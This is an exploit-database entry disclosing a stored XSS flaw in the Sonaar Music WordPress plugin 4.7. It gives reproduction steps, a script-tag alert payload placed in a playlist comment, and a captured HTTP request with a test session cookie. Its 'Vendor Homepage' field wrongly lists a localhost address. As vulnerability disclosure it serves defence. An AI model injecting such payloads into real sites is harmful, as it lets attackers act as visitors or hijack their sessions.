Wordpress Sonaar Music Plugin 4.7 - Stored XSS

vendor:

Sonaar Music Plugin

by:

Furkan Karaarslan

4.1

CVSS

MEDIUM

Stored XSS

CWE

Product Name: Sonaar Music Plugin

Affected Version From: 4.7

Affected Version To: 4.7

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows, Linux

2023

WordPress Sonaar Music Plugin 4.7 – Stored XSS

This exploit allows an attacker to execute arbitrary JavaScript code on the target Wordpress website. By adding a malicious payload in the comment section of a published playlist, the attacker can trigger the XSS vulnerability and potentially perform actions on behalf of the user.

Mitigation:

The vendor should release an updated version of the plugin that properly sanitizes user input to prevent XSS attacks. Users are advised to update to the latest version of the plugin and sanitize user-generated content before displaying it.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Sonaar Music Plugin 4.7 - Stored XSS
# Date: 2023-09-05
# Exploit Author: Furkan Karaarslan
# Category : Webapps
# Vendor Homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php
# Version: 4.7 (REQUIRED)
# Tested on: Windows/Linux
----------------------------------------------------------------------------------------------------
1-First install sonar music plugin.
2-Then come to the playlist add page. > http://127.0.0.1/wp/wordpress/wp-admin/edit.php?post_type=sr_playlist
3-Press the Add new playlist button
4-Put a random title on the page that opens and publish the page. > http://127.0.0.1/wp/wordpress/wp-admin/post-new.php?post_type=sr_playlist
5-This is the published page http://127.0.0.1/wp/wordpress/album_slug/test/
6-Let's paste our xss payload in the comment section. Payload: <script>alert("XSS")</script>
Bingoo

Request:
POST /wp/wordpress/wp-comments-post.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 155
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/wp/wordpress/album_slug/test/
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: comment_author_email_52c14530c1f3bbfa6d982f304802224a=a%40gmail.com; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26gt%3Balert%28%29; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f304802224a=hunter%7C1694109284%7CXGnjFgcc7FpgQkJrAwUv1kG8XaQu3RixUDyZJoRSB1W%7C16e2e3964e42d9e56edd7ab7e45b676094d0b9e0ab7fcec2e84549772e438ba9; wp-settings-time-1=1693936486
Connection: close

comment=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&submit=Yorum+g%C3%B6nder&comment_post_ID=13&comment_parent=0&_wp_unfiltered_html_comment=95f4bd9cf5